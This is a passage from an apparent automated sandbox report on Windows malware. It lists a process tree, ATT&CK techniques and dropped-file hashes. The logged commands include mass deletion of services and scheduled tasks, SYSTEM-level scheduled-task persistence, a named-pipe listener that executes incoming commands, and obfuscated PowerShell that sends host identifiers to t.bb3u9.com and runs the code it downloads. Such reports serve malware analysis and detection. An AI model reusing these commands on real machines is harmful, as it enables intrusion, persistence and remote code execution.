"C:\Windows\system32\sc.exe" Config "Sncryption Media Playeq" Start= Disabled
5⤵
PID:1444

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop "Sncryption Media Playeq"
5⤵
PID:1588

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete "Sncryption Media Playeq"
5⤵
PID:2232

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config SxS Start= Disabled
5⤵
PID:2608

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop SxS
5⤵
PID:2600

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete SxS
5⤵
PID:2660

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinSvc Start= Disabled
5⤵
PID:2960

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinSvc
5⤵
PID:2944

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinSvc
5⤵
PID:1276

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config mssecsvc2.1 Start= Disabled
5⤵
PID:1792

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop mssecsvc2.1
5⤵
PID:2704

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete mssecsvc2.1
5⤵
PID:1720

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config mssecsvc2.0 Start= Disabled
5⤵
PID:296

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop mssecsvc2.0
5⤵
PID:344

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete mssecsvc2.0
5⤵
PID:2236

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Windows_Update Start= Disabled
5⤵
PID:2724

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Windows_Update
5⤵
PID:1512

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Windows_Update
5⤵
PID:564

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config "Windows Managers" Start= Disabled
5⤵
PID:1672

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop "Windows Managers"
5⤵
PID:408

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete "Windows Managers"
5⤵
PID:2632

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config SvcNlauser Start= Disabled
5⤵
PID:3044

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop SvcNlauser
5⤵
PID:2160

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete SvcNlauser
5⤵
PID:1248

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinVaultSvc Start= Disabled
5⤵
PID:1700

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinVaultSvc
5⤵
PID:2824

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinVaultSvc
5⤵
PID:1604

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Xtfy Start= Disabled
5⤵
PID:1192

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Xtfy
5⤵
PID:748

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Xtfy
5⤵
PID:1916

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Xtfya Start= Disabled
5⤵
PID:2144

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Xtfya
5⤵
PID:1676

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Xtfya
5⤵
PID:816

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Xtfyxxx Start= Disabled
5⤵
PID:1716

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Xtfyxxx
5⤵
PID:2772

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Xtfyxxx
5⤵
PID:1428

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config 360rTys Start= Disabled
5⤵
PID:2144

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop 360rTys
5⤵
PID:2936

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete 360rTys
5⤵
PID:748

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config IPSECS Start= Disabled
5⤵
PID:1832

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop IPSECS
5⤵
PID:2384

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete IPSECS
5⤵
PID:2620

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config MpeSvc Start= Disabled
5⤵
PID:2744

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop MpeSvc
5⤵
PID:2824

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete MpeSvc
5⤵
PID:2836

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config SRDSL Start= Disabled
5⤵
PID:2828

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop SRDSL
5⤵
PID:1644

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete SRDSL
5⤵
PID:2532

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WifiService Start= Disabled
5⤵
PID:440

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WifiService
5⤵
PID:1448

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WifiService
5⤵
PID:844

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config ALGM Start= Disabled
5⤵
PID:884

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop ALGM
5⤵
PID:1444

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete ALGM
5⤵
PID:2684

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config wmiApSrvs Start= Disabled
5⤵
PID:1604

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop wmiApSrvs
5⤵
PID:1700

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete wmiApSrvs
5⤵
PID:1732

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config wmiApServs Start= Disabled
5⤵
PID:1276

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop wmiApServs
5⤵
PID:1512

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete wmiApServs
5⤵
PID:2632

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config taskmgr1 Start= Disabled
5⤵
PID:2516

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop taskmgr1
5⤵
PID:1972

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete taskmgr1
5⤵
PID:952

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WebServers Start= Disabled
5⤵
PID:3064

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WebServers
5⤵
PID:2448

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WebServers
5⤵
PID:2580

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config ExpressVNService Start= Disabled
5⤵
PID:1624

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop ExpressVNService
5⤵
PID:2728

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete ExpressVNService
5⤵
PID:948

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WWW.DDOS.CN.COM Start= Disabled
5⤵
PID:3008

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WWW.DDOS.CN.COM
5⤵
PID:2756

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WWW.DDOS.CN.COM
5⤵
PID:580

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinHelpSvcs Start= Disabled
5⤵
PID:2468

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinHelpSvcs
5⤵
PID:1648

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinHelpSvcs
5⤵
PID:2360

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config aspnet_staters Start= Disabled
5⤵
PID:476

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop aspnet_staters
5⤵
PID:1476

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete aspnet_staters
5⤵
PID:848

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config clr_optimization Start= Disabled
5⤵
PID:2776

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop clr_optimization
5⤵
PID:1776

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete clr_optimization
5⤵
PID:892

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config AxInstSV Start= Disabled
5⤵
PID:2352

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop AxInstSV
5⤵
PID:1160

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete AxInstSV
5⤵
PID:2412

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Zational Start= Disabled
5⤵
PID:1480

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Zational
5⤵
PID:1544

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Zational
5⤵
PID:2784

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config "DNS Server" Start= Disabled
5⤵
PID:488

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop "DNS Server"
5⤵
PID:3040

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete "DNS Server"
5⤵
PID:620

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Serhiez Start= Disabled
5⤵
PID:2248

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Serhiez
5⤵
PID:852

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Serhiez
5⤵
PID:2944

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config SuperProServer Start= Disabled
5⤵
PID:2792

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop SuperProServer
5⤵
PID:2676

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete SuperProServer
5⤵
PID:2232

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config ".Net CLR" Start= Disabled
5⤵
PID:2848

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop ".Net CLR"
5⤵
PID:2664

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete ".Net CLR"
5⤵
PID:800

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WissssssnHelp32 Start= Disabled
5⤵
PID:2708

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WissssssnHelp32
5⤵
PID:2872

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WissssssnHelp32
5⤵
PID:2704

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinHasdadelp32 Start= Disabled
5⤵
PID:2800

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinHasdadelp32
5⤵
PID:2328

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinHasdadelp32
5⤵
PID:876

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinHasdelp32 Start= Disabled
5⤵
PID:2732

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinHasdelp32
5⤵
PID:2880

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinHasdelp32
5⤵
PID:2420

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config ClipBooks Start= Disabled
5⤵
PID:1420

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop ClipBooks
5⤵
PID:996

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete ClipBooks
5⤵
PID:1988

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN my1 /F
5⤵
PID:2928

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa /F
5⤵
PID:2856

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa1 /F
5⤵
PID:1172

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa2 /F
5⤵
PID:2688

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa3 /F
5⤵
PID:2720

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN ok /F
5⤵
PID:2408

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "Oracle Java" /F
5⤵
PID:1588

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "Oracle Java Update" /F
5⤵
PID:1192

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "Microsoft Telemetry" /F
5⤵
PID:408

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "Spooler SubSystem Service" /F
5⤵
PID:2612

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "Oracle Products Reporter" /F
5⤵
PID:2924

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "Update service for products" /F
5⤵
PID:2592

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN gm /F
5⤵
PID:2808

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN ngm /F
5⤵
PID:1920

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Sorry /F
5⤵
PID:2844

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Windows_Update /F
5⤵
PID:1760

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Update_windows /F
5⤵
PID:2764

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsUpdate1 /F
5⤵
PID:1968

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsUpdate2 /F
5⤵
PID:2668

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsUpdate3 /F
5⤵
PID:2696

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN AdobeFlashPlayer /F
5⤵
PID:916

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN FlashPlayer1 /F
5⤵
PID:1516

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN FlashPlayer2 /F
5⤵
PID:2644

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN FlashPlayer3 /F
5⤵
PID:1288

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN IIS /F
5⤵
PID:296

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsLogTasks /F
5⤵
PID:2624

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "System Log Security Check" /F
5⤵
PID:552

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Update /F
5⤵
PID:2000

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Update1 /F
5⤵
PID:2672

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Update2 /F
5⤵
PID:2864

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Update3 /F
5⤵
PID:2548

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Update4 /F
5⤵
PID:928

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN DNS /F
5⤵
PID:1612

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN SYSTEM /F
5⤵
PID:372

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN DNS2 /F
5⤵
PID:2940

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN SYSTEMa /F
5⤵
PID:2272

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN skycmd /F
5⤵
PID:2660

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Miscfost /F
5⤵
PID:2064

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Netframework /F
5⤵
PID:1796

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Flash /F
5⤵
PID:2044

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN RavTask /F
5⤵
PID:1972

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN GooglePingConfigs /F
5⤵
PID:1968

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN HomeGroupProvider /F
5⤵
PID:2880

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN MiscfostNsi /F
5⤵
PID:2516

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN WwANsvc /F
5⤵
PID:2620

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Bluetooths /F
5⤵
PID:2408

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Ddrivers /F
5⤵
PID:2632

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN DnsScan /F
5⤵
PID:2360

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN WebServers /F
5⤵
PID:1448

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Credentials /F
5⤵
PID:2732

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN TablteInputout /F
5⤵
PID:892

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN werclpsyport /F
5⤵
PID:440

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN HispDemorn /F
5⤵
PID:2580

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN LimeRAT-Admin /F
5⤵
PID:852

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN DnsCore /F
5⤵
PID:296

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "Update service for Windows Service" /F
5⤵
PID:2864

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN DnsCore /F
5⤵
PID:876

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN ECDnsCore /F
5⤵
PID:2764

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe"
5⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:2776

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -anop TCP
5⤵
- Gathers network information
PID:2828

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn t.bb3u9.com /F /tr t.bb3u9.com
3⤵
- Creates scheduled task(s)
PID:2412

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \ZNnVEs6 /F /tr "powershell -c PS_CMD"
3⤵
- Creates scheduled task(s)
PID:2516

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn \ZNnVEs6
3⤵
PID:2580

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\gqmicxaz\gqmicxaz.cmdline"
3⤵
PID:816

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES1C76.tmp" "c:\Windows\Temp\gqmicxaz\CSC8B4D4513E4B74A1A8EDFF9BC092F18.TMP"
4⤵
PID:2916

\??\c:\windows\system32\cmd.exe
/c powershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();$sr.Dispose();$pipe.Dispose();I`Ex($cmd);(new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7')).WaitForConnection()
3⤵
PID:2944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();$sr.Dispose();$pipe.Dispose();I`Ex($cmd);(new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7')).WaitForConnection()
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3028

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c schtasks /create /ru SYSTEM /sc MINUTE /mo 50 /tn \Microsoft\Windows\tecmu /tr C:\Windows\TEMP\tecmu.exe /F
3⤵
PID:1548

C:\Windows\system32\schtasks.exe
schtasks /create /ru SYSTEM /sc MINUTE /mo 50 /tn \Microsoft\Windows\tecmu /tr C:\Windows\TEMP\tecmu.exe /F
4⤵
- Creates scheduled task(s)
PID:2764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?rep_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2612

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2168

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
fc7a5d447f5b9ae5af90f3ea41489c3b

SHA1
42e2cbcb746ee8f5625eb9a10d35064331a54846

SHA256
05c154fbfdbfe7c4df59737e0af23a2c31b3fd3b0f886ba0e3ce4f63c6dee997

SHA512
e8bf594f268470de3296bcfd276261ee0c654422315ffe3b0acbe205b75d135ce8c2b12231a4e3822cbcb0ef395ae974dfd3740b81f12d3223d433989b2d9d0f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
8f22fd82ede5313b18658e11e4f979c1

SHA1
fdad2d303b908d9ae05daeb1b5eb866504cf7d42

SHA256
6bd7ef513b480f8e4ba16d757fd3e18b68c78e0219e5311e11c495de49980e09

SHA512
3fd2c3482668e59128702214f297413c97583fad20bb40d29c5def5151f2f663dbcdb9579661a986773317fe072c8ac5a26295d8019a41bad55ea9b85c0c36ff

Download Submit
C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exe
MD5
4a4cbece09f3b7090046b8aa726611df

SHA1
f53aa0b940747952babecf6ec7dd5e7bfe0cf96e

SHA256
f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6

SHA512
4759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c

Download Submit
C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exe
MD5
4a4cbece09f3b7090046b8aa726611df

SHA1
f53aa0b940747952babecf6ec7dd5e7bfe0cf96e

SHA256
f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6

SHA512
4759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c

Download Submit
C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exe
MD5
4a4cbece09f3b7090046b8aa726611df

SHA1
f53aa0b940747952babecf6ec7dd5e7bfe0cf96e

SHA256
f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6

SHA512
4759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c

Download Submit
C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exe
MD5
4a4cbece09f3b7090046b8aa726611df

SHA1
f53aa0b940747952babecf6ec7dd5e7bfe0cf96e

SHA256
f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6

SHA512
4759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c

Download Submit
C:\Windows\TEMP\1liziz1t\1liziz1t.dll
MD5
e5df39d09be1de937e0efbb3a7482c3f

SHA1
fc731e155cebab410d28b3c87b7b2edf8a0afb80

SHA256
777342dbc067fb2b1238ffd3a4a23e587f26eae49ac8b0ee7c2f080050a60d6f

SHA512
681a3da1f01b810d2686ef7a04f08db0fec71e514be1b978be988b3af70e35272c66cbf75dcdd5d8a67c13888801428ab95e213c8ac95bf466b672cea926eea7

Download Submit
C:\Windows\TEMP\4grphwgc\4grphwgc.dll
MD5
2374e0af45a1383aedd491327f89aa27

SHA1
dd412ca284bf7709f7389ae5e2d7848dd1b2f02e

SHA256
76a62051fc634142a0c37357612cf7e02f1063935fa8fb69c756d66292840819

SHA512
51fb2668ed4696a08e20b7cb674a1048ab7156407b3bc0b83180252744496beee1afa03d4a100b82e294ffd48fdb55ad15f0c59c123a8ff05bdb761d039e3fc5

Download Submit
C:\Windows\TEMP\RES158.tmp
MD5
95d00fba83ff89600754f3a8c7af0eae

SHA1
